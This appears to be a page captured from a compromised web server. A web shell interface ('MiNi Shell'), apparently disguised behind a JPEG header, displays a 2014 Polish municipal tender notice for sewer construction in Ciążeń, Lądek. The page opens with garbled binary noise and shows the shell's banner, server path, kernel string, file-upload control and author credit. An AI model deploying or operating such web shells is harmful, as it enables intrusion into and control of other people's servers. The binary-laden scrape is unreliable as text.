JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140319/92590-N-2014.html

<p class="kh_header"><b>Lądek: Budowa kanalizacji sanitarnej z przykanalikami w miejscowości Ciążeń - II etap</b><br>
<b>Numer ogłoszenia: 92590 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Polna 8A, 62-406 Lądek, woj. wielkopolskie, tel. 63 276 30 78, faks 63 276 30 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zgkladek@interia.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Gospodarki Komunalnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej z przykanalikami w miejscowości Ciążeń - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kanalizacja tłoczna: Roboty pomiarowe - wytyczenie inwentaryzacja   km 0,163; wykopy koparkami  podsiębiernymi 0,60 m3  w gruncie kat.3 na odkład    m3  270,000; analogia  umocnienie wykopu m2   540,000;   podłoże pod kanały i obiekty z piasku grub. 15 cm  m3  24,450 ;zasyp wykopów spycharkami 75  KM  z przemieszczeniem  do 10 m grunt kat.3  m3   245,550 ,zagęszczenie nasypów  ubijakami  mechanicznymi grunt sypki kat. 1-3  m3   245,550 ;rury ciśnieniowe  z PE w wykopie umocnionym   O 90 metr 163,000;  połączenie rur PE  o 90 metodą zgrzewania czołowego w wykopie umocnionym  szt 15,000; próba wodna  szczelności sieci kanalizacyjnej  tłocznej (200m) z rur PCW, PE    O 90-110  szt 
1,000;przewiert  maszyną  do 20 m rura  o 150 w gruncie kategorii 1/2  metr 14,000; przeciąganie  rurociągu  O 90 w rurach ochronnych  metr 14,000.
Kanalizacja grawitacyjna
 Roboty pomiarowe - wytyczenia inwentaryzacja   km    3,656 ; wykopy koparkami podsiębiernymi 0,60   m3    na odkład   w gruncie kat.  3  m3   6617,000 ; wykop liniowy pionowy  szer.0,8-1,5  m   głęb. do  3,0 m w gruncie kat  3-4  m3    2834,000 ;analogia - umocnienie wykopu m2 18 902,000; iglofiltry  wpłukiwane  w grunt z obsypką  głęb.do 6,0 m  szt 350,000; iglofiltry wpłukiwane  w grunt bez opsypki głęb. do 4,0 m szt  250, 000 m ;pompowanie próbne pomiarowe  lub oczyszczające godz.1000,000;podłoże pod kanały  i obiekty z piasku grub. 15  cm m3   603,240 ; zasyp wykopów spycharkami  75 KM  z przemieszczeniem  do 10 m  gruntu kat.3  m3    7641,280 ; zagęszczenie nasypów ubijakami  mechanicznymi  grunt sypki kat.1-3    m3   7641,280; kanały z rur kanalizacyjnych  PVC O   200 łączone na  wcisk  w  wykopie   umocnionym metr 3683,000 ;studnia rewizyjna  z kręgów betonowych O  1000  głębokości 3 m szt  128,000; studia rewizyjna  z kręgów betonowych O  1000 - różnica 0,5 m głębokości szt   -179,000 próba szczelności  kanałów rurowych  O  200 (długość 50 m)  szt 73,000; analogia  - osypka  rurociągu  0,3 m 1206,480; przewiert maszyną  do 20 m rura O 350 w gruncie kat.3/4 metr  108,000; przeciąganie rurociągu O  200 w rurach ochronnych   metr 108,000 ;wycena własna -utylizacja wyporu m3   1809,720; wykopy koparkami podsiębiernymi 0,60 m3    w gruncie kat. 1-2 na odkład  m3   35,940; wycena Własna technologia pompowni wraz z obudową  kmpl  1,000; wycena własna - monitoring  kmpl   1; analogia  umocnienie ścian  wykopów  obiektowych głęb. do 6,0 m wypraskami stalowymi w gruncie kat. 1-2 m2  57,500;igłofiltry wpłukiwane w grunt  z obsypką  głeb do 6,0 m szt 15,000; pompowanie próbne pomiarowe lub  oczyszczające  m-godz   24,000; zasyp wykopu spycharkami  75 KM z przemieszczeniem do 10 m gruntu  kat.3 m3   25,780; zagęszczenie nasypów ubijakami mechanicznymi grunt sypki kat 1-3  m3 25,780;wycena własna  utylizacja wyporu m3  10,160 ;
 Pompownia P3
 Wykopy koparkami  podsiębiernymi  0,60  m3    w gruncie kat 1-2 na odkład  m3    18,640; wycena własna- technologia pompowni wraz z obudowa kmpl  1,000 ; wycena własna  - monitoring  kplm 1,000; analogiaumocnienie ścian wykopów obiektowych głęb do 6,0 m wypraskami stalowymi w gruncie  kat.1-2
m2 37,280; igłofiltry wpłukiwane  w grunt z obsypką głęb do 6,0 m szt 10,000; pompowanie próbne pomiarowe lub oczyszczające m-godz. 10,000 ; zasyp wykopów spycharkami  75 KM z przemieszczeniem do 10 m gruntu kat 3 m3    13,370 ; zagęszczenie nasypów ubijakami mechanicznymi grunt sypki kat.1-3m3   13,370 , wycena własna - utylizacja  wyporu m3   5,270 ;
przyłącza kanalizacyjne
 roboty pomiarowe - wytyczenie i inwentaryzacja km 1,087 ; wykopy koparkami podsiębiernymi0,60 m3   w gruncie kat. 3 na odkład  2358,000; analogia  - umocnienie wykopu m2 3820,000; podłoże pod kanały i  obiekty z piasku   grub 15 cm ` m3   120,300; Analogia - obsypka rurociągu  0,3 m    m3   326,100; zasyp wykopów spycharkami 75 KM z przemieszczeniem  do 10 m grunt kat. 3  m3    1911,000; zagęszczenie  nasypów ubijakami  mechanicznymigrunt sypki kat 1-3  m3    1911,000 ;kanały z rur kanalizacyjnych  PVC O 160 łączone na wcisk w wykopie umocnionym  metr 802,000; studzienka  0,425 l =1,0 m ze stożkiem  i pokrywą żeliwną  szt 36,000; montaż kształtek PVC kanalizacyjnych zewnętrznych łączonych na wcisk o 160  w wykopie umocnionymszt 63,000; rury ciśnieniowe  z PE w wykopie umocnionym  O 90 metr 285,000;połączenie rur PE O 90 metodą zgrzewania czołowego w wykopie umocnionym szt 24,000; wycena własna - pompownia przydomowa z osprzętem kmpl 2,000; wycena własna - utylizacja wyporu m3    446,400; przewiert do 20 m rura O 273 w gruncie kat. ? metr 50 ;przewiert do 20 m rura  O 168 w gruncie kategorii 1/2  metr 8,000;
przeciąganie rurociągu O 160 w  rurach ochronnych  metr 50,000; przeciąganie rurociągu O 1o0 w  rurach ochronnych  metr 8,000;
Roboty rozbiórkowe  i odtworzeniowe   drogowe
ręczne rozebranie  podbudowy bitumicznej grub. 4 cm, m2 292,000; ręczne rozebranie  podbudowy z kruszywa  grub. 15cm,  m2 292,000; ręczne profilowanie  i zagęszczanie podłoża kat 1-2 m2 292,000; warstwa dolna podbudowy z kruszywa  łamanego grub. 15 cm m2 292,000; warstwa górna podbudowy z kruszywa  łamanego grub. 8 cm m2 292,000;nawierzchnia  asfaltowo-grysowa  warstwa wiążąca grub. 2 cm m2 292,000; nawierzchnia  asfaltowo-grysowa  warstwa wiążąca  - dodatek za 1 cm m2 1460,000;nawierzchnia  asfaltowo-grysowa  warstwa ścieralna  grub. 2 cm m2 292,000; nawierzchnia  asfaltowo-grysowa  warstwa ścieralna  - dodatek za 1 cm m2 876,000; analogia  - rozebranie  nawierzchni płyt betonowych m2 94,000; analogia  - nawierzchnia z kamienia obrobionego 16-20 cm m2 94,000;
Uwaga:
Jeżeli w opisie przedmiotu zamówienia lub dokumentacji projektowej  zostały wykonane znaki towarowe, patenty oraz pochodzenie urządzeń i materiałów  należy je traktować , jako propozycje projektanta..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające stanowiące nie więcej niż 50 % wartości zamówienia podstawowego w zakresie budowy kolektorów grawitacyjnych i tłocznych,
przyłączy kanalizacyjnych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 50 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust.1 pkt.1 (prowadzenie działalności w zakresie objętym zamówieniem - roboty ogólno budowlane)                              -</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone w art. 22 ust. 1 pkt. 2 ustawyoraz spełniający warunki udziału w postępowaniu tj:Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać , że w okresie ostatnich 5 lat przed upływem skladania ofery, a jeśli okres działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia( roboty budowlane związane z budową kanalizacji sanitarnych,) z podaniem jej wartości oraz daty i miejsca wykonania oraz załączy dowody wydane przez podmiot na rzecz którego zostały wykonane, żę roboty te zostały wykonane w sposób należyty oraz wskazujący, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (wartość jednej roboty nie mniejsza niż 1 500 000,00 zł brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie, że dysponuje odpowiednim potrencjałem technicznym  niezbędnym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się   Wykonawcy spełniający  warunki określone   w art. 22 ust.1 pkt 3.ustawy spełniający warunki. Wykonawca  ubiegający  się o udzielenie  zamówienia musi wykazać , że w wykonaniu zamówienia uczestniczyć będzie  : 
 - kierownik budowy posiadający uprawnienia  do wykonywania  samodzielnych funkcji w  budownictwie  o  specjalności instalacyjnej  w zakresie  sieci i instalacji sanitarnej  bez  ograniczeń  zgodnie z obowiązującym polskim  Prawem budowlanym  lub odpowiadające  im  ważne uprawnienia budowlane , które zostały wydane na podstawie  wcześniej  obowiązujących przepisów  lub odpowiadające im uprawnienia wydane obywatelom państwa  Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej  z 
  zastrzeżeniem  art. 12a oraz innych Przepisów  ustawy Prawo Budowlane  (tekst jednolity Dz. U z 2010 r. Nr 43 poz. 1623 z późn. zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U z 2008 r . , Nr   63 poz.394)-:
  - kierownik robót elektrycznych posiadający  uprawnienia do  wykonywania samodzielnych  funkcji w budownictwie bez ograniczeń do kierowania robotami budowlanymi w zakresie  sieci elektrycznych  lub odpowiadające im ważne  uprawnienia budowlane, które zostały  wydane na podstawie  wcześniej obowiązujących przepisów lub  odpowiadające im  uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej  z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane  (tekst Jednolity  Dz. U. z 2010 r Nr 43 poz. 1623 z późn. zm) oraz ustawy oraz zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U . z 2008 ., Nr 63 poz.394),
- kierownik robót drogowych  posiadający uprawnienia  do wykonywania samodzielnych  funkcji w budownictwie bez  ograniczeń o kierowania  robotami budowlanymi w zakresie dróg , bądź też odpowiadające im uprawnienia  budowlane wydane  na podstawie wcześniej obowiązujących przepisów  lub odpowiadające  im uprawnienia  wydane obywatelom państw  Europejskiego  Obszaru Gospodarczego oraz  konfederacji Szwajcarskiej  z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane  (tekst jedn. Dz. U z 2010 r   Nr  43  poz. 1623 z późn. zm) oraz ustawy o zasadach o zasadach uznawania kwalifikacji zawodowych  nabytych w państwach członkowskich  Unii Europejskiej  ( Dz. U z 2008 r. Nr 63 poz
. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Posiadanie środków finansowych lub zdolnośc kredytową w wysokości co najmniej
2 500 000,00 zł(słownie:dwamilionypięćsettysięcy i 0/100 zł;
-Posiadanie polisy ubezpieczeniowej a w przypadku jej braku inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności an kwotę co najmniej 1 000 000,00 zł (słownie:jedenmilion i 0/100zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmiany umowy w stosunku do treści oferty Wykonawcy w następujących okolicznościach:
1)Zmiany osoby kierownika budowy i kierownika robót pod warunkiem, że nowa osoba posiada takie same uprawnienia i spełnia wymogi SIWZ; 
2)Zmiany terminu realizacji przedmiotu umowy spowodowane:
a)koniecznością wykonania zamówień dodatkowych, albo wykonania części robót inną technologią niż założona w dokumentacji,
b)zaistnieniem sytuacji skutkującej, że rozpoczęcie robót jest niemożliwe z przyczyn leżących po stronie Zamawiającego do czasu niezbędnego do usunięcia 
przyczyn niemożności rozpoczęcia prac,
c)siłą wyższą lub klęską żywiołową uniemożliwiającą wykonanie przedmiotu umowy zgodnie z umową,
d)warunkami pogodowymi uniemożliwiającymi prowadzenie robót jeżeli odbiegają od  normalnych zjawisk pogodowych (długotrwałe opady atmosferyczne)
e)niemożliwymi wcześniej do przewidzenia brakami w dokumentacji i koniecznością jej uzupełnienia albo wprowadzenia do niej zmian o czas niezbędny  na przeprojektowanie dokumentacji,
f)przerwaniem prac przez właściwe organy administracji rządowej i samorządowej  
albo jako wykonanie prawomocnego orzeczenia sądu, za co nie można przypisać 
 winy Wykonawcy,
g)koniecznością usunięcia  niewypałów i niewybuchów o czas niezbędny do usunięcia przyczyn wstrzymania prac,
h)koniecznością usunięcia wykopalisk archeologicznych do czasu niezbędnego do usunięcia przyczyn wstrzymania prac, 
i)odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych oraz odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, a w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
j)zmiany w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu umowy lub wprowadzenia tych zmian dokona Zamawiający .
3)Zmiany podwykonawcy na pisemny wniosek Wykonawcy lub rezygnację z udziału podwykonawcy .Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o rezygnacji z udziału w realizacji przedmiotu umowy i braku roszczeń wobec Wykonawcy z tytułu realizacji robót.
2.Każda ze stron powołując się na okoliczności, o których mowa w ust.2 pkt 2) zobowiązana jest informować drugą stronę o zaistniałym fakcie w terminie 7 dni od dnia jego zaistnienia.
3.Nie stanowią zmiany umowy i nie wymagają aneksu zmiany związane z obsługą administracyjno- organizacyjną umowy / np. zmiana rachunku bankowego lub zmiana danych adresowych, zmiana inspektora nadzoru / , które wymagają pisemnego zgłoszenia drugiej stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gmina-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej Lądek
62-406 Lądek , ul. Polna 8a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 10:00, miejsce: Zakład Gospodarki Komunalnej Lądek (sekretariat)
62-406 Lądek, ul. Polna 8a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie  współfinansowane ze środków Unii Europejskiej  w ramach działania321 -
Podstawowe usługi dla gospodarki i ludności wiejskiej- Program Rozwoju obszarów wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com